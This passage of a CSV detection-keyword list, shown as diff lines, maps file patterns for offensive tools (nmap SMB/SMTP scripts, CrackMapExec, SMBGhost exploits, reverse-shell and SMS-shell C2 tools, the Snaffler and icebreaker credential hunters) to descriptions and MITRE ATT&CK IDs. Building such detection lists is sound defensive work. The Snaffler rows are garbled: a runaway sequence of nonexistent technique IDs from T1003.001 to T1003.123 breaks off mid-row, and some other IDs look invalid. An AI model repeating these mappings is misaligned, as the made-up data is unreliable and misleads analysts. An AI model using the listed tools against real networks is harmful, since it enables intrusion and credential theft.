- TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/SMBeagle*","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","9","7","651","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" +"*/smb-enum-domains.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/smb-enum-groups.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/smb-enum-processes.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/smb-enum-services.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/smb-enum-sessions.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/smb-enum-shares.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/smb-enum-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/smbexec.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*/smbexec.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*/smb-flood.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/SMBForwarder.txt*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/SMBGhost/scanner.py*","offensive_tool_keyword","SMBGhost","Simple scanner for CVE-2020-0796 - SMBv3 RCE.","T1210 - T1573 - T1553 - T1216 - T1027","TA0006 - TA0011 - TA0008","N/A","N/A","Exploitation tools","https://github.com/ollypwn/SMBGhost","1","1","N/A","N/A","7","647","206","2020-10-01T08:36:29Z","2020-03-11T15:21:27Z" +"*/SMBGhost_RCE*","offensive_tool_keyword","SMBGhost_RCE_PoC","RCE PoC for CVE-2020-0796 SMBGhost","T1210 - T1059 - T1505 - T1021 - T1027","TA0001 - TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tools","https://github.com/chompie1337/SMBGhost_RCE_PoC","1","1","N/A","N/A","10","1264","355","2020-07-02T18:51:47Z","2020-06-02T00:14:47Z" +"*/smbldap.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*/smb-ls.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/smbmap.git*","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","1","N/A","10","10","1555","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z" +"*/smbmapDump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/smb-mbenum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/smb-os-discovery.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/smb-print-text.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/smb-protocols.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/smb-psexec.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/smb-reverse-shell*","offensive_tool_keyword","smb-reverse-shell","A Reverse Shell which uses an XML file on an SMB share as a communication channel.","T1021.002 - T1027 - T1105","TA0008 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/r1cksec/smb-reverse-shell","1","1","N/A","10","10","9","0","2022-07-31T10:05:53Z","2022-01-16T21:02:14Z" +"*/smb-security-mode.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/smbserver/smb_server.py*","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","1","N/A","N/A","6","533","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" +"*/smb-server-stats.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/smb-signing-disabled-hosts.txt*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" +"*/smbspider.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/smbsr.db*","offensive_tool_keyword","SMBSR","Lookup for interesting stuff in SMB shares","T1110.001 - T1046 - T1021.002 - T1077.001 - T1069.002 - T1083 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Reconnaissance","https://github.com/oldboy21/SMBSR","1","1","N/A","N/A","2","138","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" +"*/SMBSR.git*","offensive_tool_keyword","SMBSR","Lookup for interesting stuff in SMB shares","T1110.001 - T1046 - T1021.002 - T1077.001 - T1069.002 - T1083 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Reconnaissance","https://github.com/oldboy21/SMBSR","1","1","N/A","N/A","2","138","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" +"*/smbsr.log*","offensive_tool_keyword","SMBSR","Lookup for interesting stuff in SMB shares","T1110.001 - T1046 - T1021.002 - T1077.001 - T1069.002 - T1083 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Reconnaissance","https://github.com/oldboy21/SMBSR","1","1","N/A","N/A","2","138","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" +"*/smb-system-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/smb-vuln-conficker.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/smb-vuln-cve2009-3103.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/smb-vuln-cve-2017-7494.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/smb-vuln-cve-2020-0796.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","1","N/A","N/A","10","920","383","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z" +"*/smb-vuln-ms06-025.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/smb-vuln-ms07-029.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/smb-vuln-ms08-067.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/smb-vuln-ms10-054.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/smb-vuln-ms10-061.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/smb-vuln-ms17-010.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/smb-vuln-regsvc-dos.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/smb-vuln-webexec.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/smb-webexec-exploit.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/SMShell.git*","offensive_tool_keyword","SMShell","PoC for a SMS-based shell. Send commands and receive responses over SMS from mobile broadband capable computers","T1021.001 - T1059.006 - T1071.004 - T1069.003","TA0002 - TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/persistent-security/SMShell","1","1","N/A","10","10","272","20","2023-05-22T10:40:16Z","2023-05-22T08:26:44Z" +"*/SMShell/*","offensive_tool_keyword","SMShell","PoC for a SMS-based shell. Send commands and receive responses over SMS from mobile broadband capable computers","T1021.001 - T1059.006 - T1071.004 - T1069.003","TA0002 - TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/persistent-security/SMShell","1","0","N/A","10","10","272","20","2023-05-22T10:40:16Z","2023-05-22T08:26:44Z" +"*/smtp-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/smtp-commands.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/smtp-enum-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/smtp-ntlm-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/smtp-open-relay.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/smtp-strangeport.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/smtp-user-enum*","offensive_tool_keyword","smtp-user-enum","Username guessing tool primarily for use against the default Solaris SMTP service. Can use either EXPN - VRFY or RCPT TO.","T1133 - T1110.001","TA0007 - TA0006","N/A","N/A","Credential Access","https://pentestmonkey.net/tools/user-enumeration/smtp-user-enum","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/smtp-vuln-cve2010-4344.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/smtp-vuln-cve2011-1720.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/smtp-vuln-cve2011-1764.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/smtp-vuln-cve2020-28017-through-28026-21nails.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/nccgroup/nmap-nse-vulnerability-scripts","1","1","N/A","N/A","7","620","64","2022-03-04T09:08:55Z","2021-05-18T15:20:30Z" +"*/smuggler.py*","offensive_tool_keyword","smuggler.py","HTML Smuggling Generator","T1564.001 - T1027 - T1566","TA0005","N/A","N/A","Phishing - Defense Evasion","https://github.com/infosecn1nja/red-team-scripts/blob/main/smuggler.py","1","1","N/A","9","3","229","42","2023-06-14T02:13:19Z","2023-01-15T22:37:34Z" +"*/SnaffCon.cs*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*/SnaffCon/Snaffler*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 